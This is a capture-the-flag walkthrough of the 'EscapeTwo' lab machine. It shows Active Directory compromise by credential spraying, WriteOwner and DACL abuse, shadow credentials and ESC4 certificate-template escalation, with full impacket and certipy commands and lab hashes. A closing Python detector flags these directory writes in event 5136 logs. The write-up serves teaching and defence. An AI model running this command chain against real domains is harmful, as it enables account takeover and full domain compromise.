# EscapeTwo

## 0x1 Recon

* ![image](https://hackmd.io/_uploads/Bk_2Jcvh1x.png)

### Rustscan

* ![image](https://hackmd.io/_uploads/rJJYJ9Pnyg.png)

### Nmap

* ![image](https://hackmd.io/_uploads/SkcjPcw3ye.png)

## 0x2 Enumeration

* Use `nxc` to enumerate the LDAP users
* ![image](https://hackmd.io/_uploads/B1eO_9P3Jx.png)
* Shared folders
* ![image](https://hackmd.io/_uploads/S1QLocv21l.png)

## 0x3 SMB files

* Files under the `Users` folder
* ![image](https://hackmd.io/_uploads/ryDr8oDnyx.png)
* Files under the `Accounting Department` folder
* ![image](https://hackmd.io/_uploads/Hy2QjownJe.png)
* Found some user credentials in `accounts.xlsx`
* ![image](https://hackmd.io/_uploads/r11epsPn1g.png)

## 0x4 Credential spraying

* Build a user list from the LDAP users
* ![image](https://hackmd.io/_uploads/rJ37Ghw2ye.png)
* Tried to crack a WinRM user, but everyone can connect to WinRM
* Only two users have LDAP permission
* ![image](https://hackmd.io/_uploads/HJmxU2v3yl.png)

## 0x5 MSSQL

* Got an MSSQL user
* ![image](https://hackmd.io/_uploads/SkRgOhwhyl.png)
* Another user credential in `C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI`
* ![image](https://hackmd.io/_uploads/HkqV02P21l.png)
* Keep spraying this password against LDAP and WinRM
* ![image](https://hackmd.io/_uploads/B1hXk6whJl.png)

## 0x6 Get shell & User.txt

* Use `evil-winrm` to get a shell as user ryan, and grab the user flag
* ![image](https://hackmd.io/_uploads/By02kaD3ye.png)

## 0x7 Privilege Escalation

### WriteOwner

* ![image](https://hackmd.io/_uploads/H1LBZ1O3yx.png)
* User `ca_svc` belongs to the Cert Publishers group
* ![image](https://hackmd.io/_uploads/S1rNKkK21g.png)
* Use `bloodhound` to enumerate user ryan
* ![image](https://hackmd.io/_uploads/SyJd7Rwnkg.png)
* Found that ryan has the WriteOwner privilege over ca_svc
* ![image](https://hackmd.io/_uploads/BksQIADnJx.png)
* Import the `PowerSploit` module

```powershell=
git clone https://github.com/PowerShellMafia/PowerSploit.git
Import-Module .\PowerSploit\Recon\PowerView.ps1
# or load it in memory instead of importing the module file
IEX (Get-Content .\PowerSploit\Recon\PowerView.ps1 -Raw)
```

* Use `bloodyAD` to set `ryan` as the owner
* ![image](https://hackmd.io/_uploads/ryJ2x1uhJg.png)
* Grant FullControl on the target user

```powershell=
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
```

* ![image](https://hackmd.io/_uploads/SkyviJKhyg.png)

### [ShadowCredentials](https://exploit-notes.hdks.org/exploit/windows/active-directory/shadow-credentials/)

:::info
If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.
:::

:::info
Shadow Credentials is a technique that binds a fake credential (a Kerberos key credential) to the target account.
Even if the target account's password is changed, you can still authenticate with that fake credential.
It is a stealthy persistence technique that does not require changing the target account's password.
:::

* When I tried to use `certipy-ad` to generate the fake credential, it showed that our clock is too slow compared to the machine
* ![image](https://hackmd.io/_uploads/ByNQkeF3Je.png)
* ![image](https://hackmd.io/_uploads/ByDNxxK21x.png)
* Run `ntpdate` to sync our time with the machine

```bash=
sudo ntpdate escapetwo.htb
```

* Got `ca_svc`'s NT hash
* ![image](https://hackmd.io/_uploads/HyN0WeF2kg.png)

```bash=
certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target escapetwo.htb -dc-ip 10.10.11.51 -ns 10.10.11.51
```

* Running `certipy-ad find` for vulnerable templates shows that the template named `DunderMifflinAuthentication` is vulnerable to `ESC4`
* ![image](https://hackmd.io/_uploads/SkcK8eK3Jx.png)
* ![image](https://hackmd.io/_uploads/B1ocLeY2Jx.png)

### Use the vulnerable template

* ![image](https://hackmd.io/_uploads/SJnXFetnJe.png)

```bash=
certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug
```

### Request a certificate for Administrator from the template

* This step must be done quickly after you update the template, or you'll get an error about the DNS name

```bash=
certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51
```

* ![image](https://hackmd.io/_uploads/BJcJs-Fnyg.png)

### Authenticate as Administrator

* You will get the NT hash after authenticating with the pfx certificate
* ![image](https://hackmd.io/_uploads/SJnEa-K3kl.png)

```bash=
certipy-ad auth -pfx administrator_10.pfx
```

## 0x8 root.txt

* ![image](https://hackmd.io/_uploads/ryEF6WYhyx.png)
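From the defender's side, every step of the escalation above (the DACL rewrite on `ca_svc`, the `msDS-KeyCredentialLink` append for shadow credentials, and the template edit that makes ESC4 possible) is a write to a directory attribute, so a DC with Directory Service Changes auditing (event ID 5136) on those objects records it. The script below is an added example, not part of the writeup, that runs three such rules over constructed, cut-down 5136 records; the field layout and the rule conditions are assumptions.

```python
import re
# Constructed sample of Windows Security event 5136 (Directory Service Changes)
# records cut down to the fields the rules need; assumed data, names per writeup.
SAMPLE_5136 = """
Account Name: ryan
DN: CN=ca_svc,CN=Users,DC=sequel,DC=htb
Class: user
LDAP Display Name: nTSecurityDescriptor

Account Name: ryan
DN: CN=ca_svc,CN=Users,DC=sequel,DC=htb
Class: user
LDAP Display Name: msDS-KeyCredentialLink

Account Name: ca_svc
DN: CN=DunderMifflinAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb
Class: pKICertificateTemplate
LDAP Display Name: msPKI-Certificate-Name-Flag
"""
# Template attributes whose change lets a requester shape the issued certificate.
TEMPLATE_ATTRS = {"msPKI-Certificate-Name-Flag", "pKIExtendedKeyUsage",
                  "msPKI-Enrollment-Flag", "nTSecurityDescriptor"}

def parse_events(text):
    """Blank-line separated events of 'Key: Value' lines -> list of dicts."""
    events = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        pairs = (line.partition(": ") for line in chunk.splitlines())
        events.append({k.strip(): v.strip() for k, _, v in pairs})
    return events

def detect(text):
    """Return (rule, actor, target CN) for each suspicious directory write."""
    hits = []
    for ev in parse_events(text):
        actor, attr = ev.get("Account Name", ""), ev.get("LDAP Display Name", "")
        cls, dn = ev.get("Class", ""), ev.get("DN", "")
        m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
        target = m.group(1) if m else dn
        # Shadow credentials: key credential added to someone else's account by a
        # non-machine principal (a machine refreshing its own link is normal).
        if attr == "msDS-KeyCredentialLink" and not actor.endswith("$") and actor.lower() != target.lower():
            hits.append(("shadow-credentials", actor, target))
        # Owner/DACL rewrite on a user object (the WriteOwner -> FullControl step).
        elif attr == "nTSecurityDescriptor" and cls == "user":
            hits.append(("acl-change", actor, target))
        # ESC4: a security-relevant attribute of a certificate template changed.
        elif cls == "pKICertificateTemplate" and attr in TEMPLATE_ATTRS:
            hits.append(("template-tamper", actor, target))
    return hits
```

Real 5136 events carry more fields (operation type, correlation ID, object GUID); the rules only need the writer, the object class and DN, and the attribute name.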